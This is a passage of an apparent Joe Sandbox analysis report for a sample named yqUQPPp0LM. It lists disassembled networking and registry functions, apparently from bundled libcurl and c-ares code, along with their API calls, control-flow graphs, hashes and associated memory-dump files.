                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: setsockopt
                                        • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                        • API String ID: 3981526788-2373386790
                                        • Opcode ID: 4cee21fa6a07268bc22ff1dad2dfa41b9adec201e0903a60615b3e17d231cbc7
                                        • Instruction ID: c622cb4f2bb3e14acb065eb392d4d12ce17a077dac8261a917bc52c96434274c
                                        • Opcode Fuzzy Hash: 4cee21fa6a07268bc22ff1dad2dfa41b9adec201e0903a60615b3e17d231cbc7
                                        • Instruction Fuzzy Hash: 75621371508341ABE724CF24D846BABB7E4FF91318F054929F988E7292E771E845CB93
                                        Function 008F9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 862 8f9740-8f975b 863 8f975d-8f9768 call 8f78a0 862->863 864 8f9780-8f9782 862->864 872 8f976e-8f9770 863->872 873 8f99bb-8f99c0 863->873 866 8f9788-8f97a0 call bb8e00 call 8f78a0 864->866 867 8f9914-8f994e call bb8b70 RegOpenKeyExA 864->867 866->873 878 8f97a6-8f97c5 866->878 876 8f995a-8f9992 RegQueryValueExA RegCloseKey call bb8b98 867->876 877 8f9950-8f9955 867->877 872->878 879 8f9772-8f977e 872->879 880 8f9a0c-8f9a15 873->880 892 8f9997-8f99b5 call 8f78a0 876->892 877->880 885 8f9827-8f9833 878->885 886 8f97c7-8f97e0 878->886 879->866 888 8f985f-8f9872 call 8f5ca0 885->888 889 8f9835-8f985c call 8ee2b0 * 2 885->889 890 8f97f6-8f9809 886->890 891 8f97e2-8f97f3 call bb8b50 886->891 903 8f9878-8f987d call 8f77b0 888->903 904 8f99f0 888->904 889->888 890->885 902 8f980b-8f9810 890->902 891->890 892->873 892->878 902->885 907 8f9812-8f9822 902->907 911 8f9882-8f9889 903->911 906 8f99f5-8f99fb call 8f5d00 904->906 917 8f99fe-8f9a09 906->917 907->880 911->906 912 8f988f-8f989b call 8e4fe0 911->912 912->904 920 8f98a1-8f98c3 call bb8b50 call 8f78a0 912->920 917->880 926 8f98c9-8f98db call 8ee2d0 920->926 927 8f99c2-8f99ed call 8ee2b0 * 2 920->927 926->927 932 8f98e1-8f98f0 call 8ee2d0 926->932 927->904 932->927 938 8f98f6-8f9905 call 8f63f0 932->938 942 8f990b-8f990f 938->942 943 8f9f66-8f9f7f call 8f5d00 938->943 944 8f9a3f-8f9a5a call 8f6740 call 8f63f0 942->944 943->917 944->943 951 8f9a60-8f9a6e call 8f6d60 944->951 954 8f9a1f-8f9a39 call 8f6840 call 8f63f0 951->954 955 8f9a70-8f9a94 call 8f6200 call 8f67e0 call 8f6320 951->955 954->943 954->944 966 8f9a16-8f9a19 955->966 967 8f9a96-8f9ac6 call 8ed120 955->967 966->954 968 8f9fc1 966->968 973 8f9ac8-8f9adb call 8ed120 967->973 974 8f9ae1-8f9af7 call 8ed190 967->974 971 8f9fc5-8f9ffd call 8f5d00 call 8ee2b0 * 2 968->971 971->917 973->954 973->974 974->954 981 8f9afd-8f9b09 call 8e4fe0 974->981 981->968 986 8f9b0f-8f9b29 call 8ee730 981->986 991 8f9b2f-8f9b3a call 8f78a0 986->991 992 8f9f84-8f9f88 986->992 991->992 999 8f9b40-8f9b54 call 8ee760 991->999 994 8f9f95-8f9f99 992->994 996 8f9f9b-8f9f9e 994->996 997 8f9fa0-8f9fb6 call 8eebf0 * 2 994->997 996->968 996->997 1009 8f9fb7-8f9fbe 997->1009 1005 8f9f8a-8f9f92 999->1005 1006 8f9b5a-8f9b6e call 8ee730 999->1006 1005->994 1012 8f9b8c-8f9b97 call 8f63f0 1006->1012 1013 8f9b70-8fa004 1006->1013 1009->968 1021 8f9b9d-8f9bbf call 8f6740 call 8f63f0 1012->1021 1022 8f9c9a-8f9cab call 8eea00 1012->1022 1018 8fa015-8fa01d 1013->1018 1019 8fa01f-8fa022 1018->1019 1020 8fa024-8fa045 call 8eebf0 * 2 1018->1020 1019->971 1019->1020 1020->971 1021->1022 1039 8f9bc5-8f9bda call 8f6d60 1021->1039 1031 8f9f31-8f9f35 1022->1031 1032 8f9cb1-8f9ccd call 8eea00 call 8ee960 1022->1032 1034 8f9f37-8f9f3a 1031->1034 1035 8f9f40-8f9f61 call 8eebf0 * 2 1031->1035 1048 8f9ccf 1032->1048 1049 8f9cfd-8f9d0e call 8ee960 1032->1049 1034->954 1034->1035 1035->954 1039->1022 1051 8f9be0-8f9bf4 call 8f6200 call 8f67e0 1039->1051 1052 8f9cd1-8f9cec call 8ee9f0 call 8ee4a0 1048->1052 1060 8f9d53-8f9d55 1049->1060 1061 8f9d10 1049->1061 1051->1022 1067 8f9bfa-8f9c0b call 8f6320 1051->1067 1073 8f9cee-8f9cfb call 8ee9d0 1052->1073 1074 8f9d47-8f9d51 1052->1074 1064 8f9e69-8f9e8e call 8eea40 call 8ee440 1060->1064 1065 8f9d12-8f9d2d call 8ee9f0 call 8ee4a0 1061->1065 1090 8f9e94-8f9eaa call 8ee3c0 1064->1090 1091 8f9e90-8f9e92 1064->1091 1087 8f9d2f-8f9d3c call 8ee9d0 1065->1087 1088 8f9d5a-8f9d6f call 8ee960 1065->1088 1082 8f9b75-8f9b86 call 8eea00 1067->1082 1083 8f9c11-8f9c1c call 8f7b70 1067->1083 1073->1049 1073->1052 1079 8f9dca-8f9ddb call 8ee960 1074->1079 1100 8f9e2e-8f9e36 1079->1100 1101 8f9ddd-8f9ddf 1079->1101 1082->1012 1103 8f9f2d 1082->1103 1083->1012 1107 8f9c22-8f9c33 call 8ee960 1083->1107 1087->1065 1116 8f9d3e-8f9d42 1087->1116 1119 8f9dc2 1088->1119 1120 8f9d71-8f9d73 1088->1120 1112 8fa04a-8fa04c 1090->1112 1113 8f9eb0-8f9eb1 1090->1113 1097 8f9eb3-8f9ec4 call 8ee9c0 1091->1097 1097->954 1122 8f9eca-8f9ed0 1097->1122 1109 8f9e3d-8f9e5b call 8eebf0 * 2 1100->1109 1110 8f9e38-8f9e3b 1100->1110 1104 8f9e06-8f9e21 call 8ee9f0 call 8ee4a0 1101->1104 1103->1031 1145 8f9e23-8f9e2c call 8eeac0 1104->1145 1146 8f9de1-8f9dee call 8eec80 1104->1146 1132 8f9c66-8f9c75 call 8f78a0 1107->1132 1133 8f9c35 1107->1133 1111 8f9e5e-8f9e67 1109->1111 1110->1109 1110->1111 1111->1064 1111->1097 1125 8fa04e-8fa051 1112->1125 1126 8fa057-8fa070 call 8eebf0 * 2 1112->1126 1113->1097 1116->1064 1119->1079 1127 8f9d9a-8f9db5 call 8ee9f0 call 8ee4a0 1120->1127 1130 8f9ee5-8f9ef2 call 8ee9f0 1122->1130 1125->968 1125->1126 1126->1009 1160 8f9db7-8f9dc0 call 8eeac0 1127->1160 1161 8f9d75-8f9d82 call 8eec80 1127->1161 1130->954 1154 8f9ef8-8f9f0e call 8ee440 1130->1154 1150 8f9c7b-8f9c8f call 8ee7c0 1132->1150 1151 8fa011 1132->1151 1140 8f9c37-8f9c51 call 8ee9f0 1133->1140 1140->1012 1176 8f9c57-8f9c64 call 8ee9d0 1140->1176 1164 8f9df1-8f9e04 call 8ee960 1145->1164 1146->1164 1150->1012 1171 8f9c95-8fa00e 1150->1171 1151->1018 1174 8f9ed2-8f9edf call 8ee9e0 1154->1174 1175 8f9f10-8f9f26 call 8ee3c0 1154->1175 1177 8f9d85-8f9d98 call 8ee960 1160->1177 1161->1177 1164->1100 1164->1104 1171->1151 1174->954 1174->1130 1175->1174 1188 8f9f28 1175->1188 1176->1132 1176->1140 1177->1119 1177->1127 1188->968
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008F9946
                                        • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 008F9974
                                        • RegCloseKey.KERNELBASE(?), ref: 008F998B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                        • API String ID: 3677997916-4129964100
                                        • Opcode ID: 11d2f1a4c5ea581a395bf24488656e2616ae632a61bde298db272399c4e0196b
                                        • Instruction ID: 0392d73a2de75d8ebf9b8888c102ac78b96ca5f8911ced5188362070a13b3857
                                        • Opcode Fuzzy Hash: 11d2f1a4c5ea581a395bf24488656e2616ae632a61bde298db272399c4e0196b
                                        • Instruction Fuzzy Hash: 7832C4B5904245ABEB11AB39EC42B3B76D8FF55318F084434FA89D6263FB21E924C753
                                        Function 00868B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1393 868b50-868b69 1394 868be6 1393->1394 1395 868b6b-868b74 1393->1395 1398 868be9 1394->1398 1396 868b76-868b8d 1395->1396 1397 868beb-868bf2 1395->1397 1399 868bf3-868bfe call 86a550 1396->1399 1400 868b8f-868ba7 call 846e40 1396->1400 1398->1397 1405 868de4-868def 1399->1405 1406 868c04-868c08 1399->1406 1407 868bad-868baf 1400->1407 1408 868cd9-868d16 SleepEx getsockopt 1400->1408 1409 868df5-868e19 call 86a150 1405->1409 1410 868e8c-868e95 1405->1410 1411 868c0e-868c1d 1406->1411 1412 868dbd-868dc3 1406->1412 1413 868ca6-868cb0 1407->1413 1414 868bb5-868bb9 1407->1414 1415 868d22 1408->1415 1416 868d18-868d20 1408->1416 1451 868e1b-868e26 1409->1451 1452 868e88 1409->1452 1417 868e97-868e9c 1410->1417 1418 868f00-868f06 1410->1418 1420 868c35-868c48 call 86a150 1411->1420 1421 868c1f-868c30 connect 1411->1421 1412->1398 1413->1408 1422 868cb2-868cb8 1413->1422 1414->1397 1423 868bbb-868bc2 1414->1423 1424 868d26-868d39 1415->1424 1416->1424 1427 868e9e-868eb6 call 842a00 1417->1427 1428 868edf-868eef call 8378b0 1417->1428 1418->1397 1453 868c4d-868c4f 1420->1453 1421->1420 1430 868cbe-868cd4 call 86b180 1422->1430 1431 868ddc-868dde 1422->1431 1423->1397 1432 868bc4-868bcc 1423->1432 1425 868d43-868d61 call 84d8c0 call 86a150 1424->1425 1426 868d3b-868d3d 1424->1426 1455 868d66-868d74 1425->1455 1426->1425 1426->1431 1427->1428 1450 868eb8-868edd call 843410 * 2 1427->1450 1448 868ef2-868efc 1428->1448 1430->1405 1431->1398 1431->1405 1438 868bd4-868bda 1432->1438 1439 868bce-868bd2 1432->1439 1438->1397 1446 868bdc-868be1 1438->1446 1439->1397 1439->1438 1454 868dac-868db8 call 8750a0 1446->1454 1448->1418 1450->1448 1457 868e2e-868e85 call 84d090 call 874fd0 1451->1457 1458 868e28-868e2c 1451->1458 1452->1410 1459 868c51-868c58 1453->1459 1460 868c8e-868c93 1453->1460 1454->1397 1455->1397 1464 868d7a-868d81 1455->1464 1457->1452 1458->1452 1458->1457 1459->1460 1467 868c5a-868c62 1459->1467 1462 868dc8-868dd9 call 86b100 1460->1462 1463 868c99-868c9f 1460->1463 1462->1431 1463->1413 1464->1397 1470 868d87-868d8f 1464->1470 1472 868c64-868c68 1467->1472 1473 868c6a-868c70 1467->1473 1475 868d91-868d95 1470->1475 1476 868d9b-868da1 1470->1476 1472->1460 1472->1473 1473->1460 1479 868c72-868c8b call 8750a0 1473->1479 1475->1397 1475->1476 1476->1397 1481 868da7 1476->1481 1479->1460 1481->1454
                                        APIs
                                        • connect.WS2_32(?,?,00000001), ref: 00868C30
                                        • SleepEx.KERNELBASE(00000000,00000000), ref: 00868CF3
                                        • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00868D0F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: Sleepconnectgetsockopt
                                        • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                        • API String ID: 1669343778-879669977
                                        • Opcode ID: 140c83692da898611c157063478166aabcead09ab9814b60f4b6d1bc60a011fd
                                        • Instruction ID: 33ee55f2c1c510c60a00993905977da1d631703c4f8e42a41cb8f2605eac5cf0
                                        • Opcode Fuzzy Hash: 140c83692da898611c157063478166aabcead09ab9814b60f4b6d1bc60a011fd
                                        • Instruction Fuzzy Hash: 7CB1B07060470AEFDB14CF24D985BA6B7A0FF45328F058628E85DDB2D2DB71E844CB62
                                        Function 00832F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1486 832f17-832f8c call d01af0 call d01ee0 1491 8331c9-8331cd 1486->1491 1492 8331d3-8331d6 1491->1492 1493 832f91-832ff4 call 831619 RegOpenKeyExA 1491->1493 1496 8331c5 1493->1496 1497 832ffa-83300b 1493->1497 1496->1491 1498 83315c-8331ac RegEnumKeyExA 1497->1498 1499 8331b2-8331c2 RegCloseKey 1498->1499 1500 833010-833083 call 831619 RegOpenKeyExA 1498->1500 1499->1496 1503 833089-8330d4 RegQueryValueExA 1500->1503 1504 83314e-833152 1500->1504 1505 8330d6-833137 call d01dc0 call d01e50 call d01ee0 call d01cf0 call d01ee0 call d00250 1503->1505 1506 83313b-83314b RegCloseKey 1503->1506 1504->1498 1505->1506 1506->1504
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: *
                                        • API String ID: 1332880857-403698594
                                        • Opcode ID: f6415df6b5dbfa91309e206d7e6ef69c1bfcd89b6ab42c02ac6d35b20fa0af80
                                        • Instruction ID: a08afec177c2d1cdf12ff7a3fc3d19388db37b32ea7865fcad078e002ec5cca7
                                        • Opcode Fuzzy Hash: f6415df6b5dbfa91309e206d7e6ef69c1bfcd89b6ab42c02ac6d35b20fa0af80
                                        • Instruction Fuzzy Hash: 2A7192B49043199FDB10DF69C58579EBBF0FF84308F10885DE898A7351E7749A888F92
                                        Function 008FAA30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 377networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1519 8faa30-8faa64 1521 8faa6a-8faaa7 call 8ee730 1519->1521 1522 8fab04-8fab09 1519->1522 1526 8fab0e-8fab13 1521->1526 1527 8faaa9-8faabd 1521->1527 1524 8fae80-8fae89 1522->1524 1530 8fae2e 1526->1530 1528 8faabf-8faac7 1527->1528 1529 8fab18-8fab50 1527->1529 1528->1530 1532 8faacd-8fab02 1528->1532 1535 8fab58-8fab6d 1529->1535 1531 8fae30-8fae4a call 8eea60 call 8eebf0 1530->1531 1544 8fae4c-8fae57 1531->1544 1545 8fae75-8fae7d 1531->1545 1532->1535 1538 8fab6f-8fab73 1535->1538 1539 8fab96-8fabab socket 1535->1539 1538->1539 1541 8fab75-8fab8f 1538->1541 1539->1530 1543 8fabb1-8fabc5 1539->1543 1541->1543 1556 8fab91 1541->1556 1546 8fabc7-8fabca 1543->1546 1547 8fabd0-8fabed ioctlsocket 1543->1547 1549 8fae6e-8fae6f 1544->1549 1550 8fae59-8fae5e 1544->1550 1545->1524 1546->1547 1551 8fad2e-8fad39 1546->1551 1552 8fabef-8fac0a 1547->1552 1553 8fac10-8fac14 1547->1553 1549->1545 1550->1549 1557 8fae60-8fae6c 1550->1557 1554 8fad3b-8fad4c 1551->1554 1555 8fad52-8fad56 1551->1555 1552->1553 1564 8fae29 1552->1564 1559 8fac37-8fac41 1553->1559 1560 8fac16-8fac31 1553->1560 1554->1555 1554->1564 1563 8fad5c-8fad6b 1555->1563 1555->1564 1556->1530 1557->1545 1561 8fac7a-8fac7e 1559->1561 1562 8fac43-8fac46 1559->1562 1560->1559 1560->1564 1570 8face7-8facfe 1561->1570 1571 8fac80-8fac9b 1561->1571 1567 8fac4c-8fac51 1562->1567 1568 8fad04-8fad08 1562->1568 1572 8fad70-8fad78 1563->1572 1564->1530 1567->1568 1575 8fac57-8fac78 1567->1575 1568->1551 1574 8fad0a-8fad28 setsockopt 1568->1574 1570->1568 1571->1570 1576 8fac9d-8facc1 1571->1576 1577 8fad7a-8fad7f 1572->1577 1578 8fada0-8fadae connect 1572->1578 1574->1551 1574->1564 1579 8facc6-8facd7 1575->1579 1576->1579 1577->1578 1580 8fad81-8fad99 1577->1580 1581 8fadb3-8fadcf 1578->1581 1579->1564 1588 8facdd-8face5 1579->1588 1580->1581 1586 8fae8a-8fae91 1581->1586 1587 8fadd5-8fadd8 1581->1587 1586->1531 1589 8fadda-8faddf 1587->1589 1590 8fade1-8fadf1 1587->1590 1588->1568 1588->1570 1589->1572 1589->1590 1591 8fae0d-8fae12 1590->1591 1592 8fadf3-8fae07 1590->1592 1593 8fae1a-8fae1c call 8faf70 1591->1593 1594 8fae14-8fae17 1591->1594 1592->1591 1597 8faea8-8faead 1592->1597 1598 8fae21-8fae23 1593->1598 1594->1593 1597->1531 1599 8fae25-8fae27 1598->1599 1600 8fae93-8fae9d 1598->1600 1599->1531 1601 8faeaf-8faeb1 call 8ee760 1600->1601 1602 8fae9f-8faea6 call 8ee7c0 1600->1602 1606 8faeb6-8faebe 1601->1606 1602->1606 1607 8faf1a-8faf1f 1606->1607 1608 8faec0-8faedb call 8ee180 1606->1608 1607->1531 1608->1531 1611 8faee1-8faeec 1608->1611 1612 8faeee-8faeff 1611->1612 1613 8faf02-8faf06 1611->1613 1612->1613 1614 8faf0e-8faf15 1613->1614 1615 8faf08-8faf0b 1613->1615 1614->1524 1615->1614
                                        APIs
                                        • socket.WS2_32(FFFFFFFF,?,00000000), ref: 008FAB9B
                                        • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 008FABE4
                                        • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 008FAD20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: ioctlsocketsetsockoptsocket
                                        • String ID: ;m
                                        • API String ID: 2067140946-2913778575
                                        • Opcode ID: 1b12078fa4c61b09ca0459e4ca6d433faaa098a70c27cb97d3f6dd96b82ec709
                                        • Instruction ID: d9a2e45ccb96cc335a6c7d90ca95b05defbc3c03e64c9236731d804affa5dfeb
                                        • Opcode Fuzzy Hash: 1b12078fa4c61b09ca0459e4ca6d433faaa098a70c27cb97d3f6dd96b82ec709
                                        • Instruction Fuzzy Hash: B8E1DFB060430A9BE724CF24C881B7BB7E5FF85324F144A2CEA98CB291D775D844CB92
                                        Function 00869290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1617 869290-8692ed call 8376a0 1620 8693c3-8693ce 1617->1620 1621 8692f3-8692fb 1617->1621 1630 8693e5-869427 call 84d090 call 874f40 1620->1630 1631 8693d0-8693e1 1620->1631 1622 869301-869333 call 84d8c0 call 84d9a0 1621->1622 1623 8693aa-8693af 1621->1623 1642 8693a7 1622->1642 1643 869335-869364 WSAIoctl 1622->1643 1624 869456-869470 1623->1624 1625 8693b5-8693bc 1623->1625 1628 8693be 1625->1628 1629 869429-869431 1625->1629 1628->1624 1636 869433-869437 1629->1636 1637 869439-86943f 1629->1637 1630->1624 1630->1629 1631->1625 1633 8693e3 1631->1633 1633->1624 1636->1624 1636->1637 1637->1624 1638 869441-869453 call 8750a0 1637->1638 1638->1624 1642->1623 1646 869366-86936f 1643->1646 1647 86939b-8693a4 1643->1647 1646->1647 1649 869371-869390 setsockopt 1646->1649 1647->1642 1649->1647 1650 869392-869395 1649->1650 1650->1647
                                        APIs
                                        • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0086935D
                                        • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00869389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
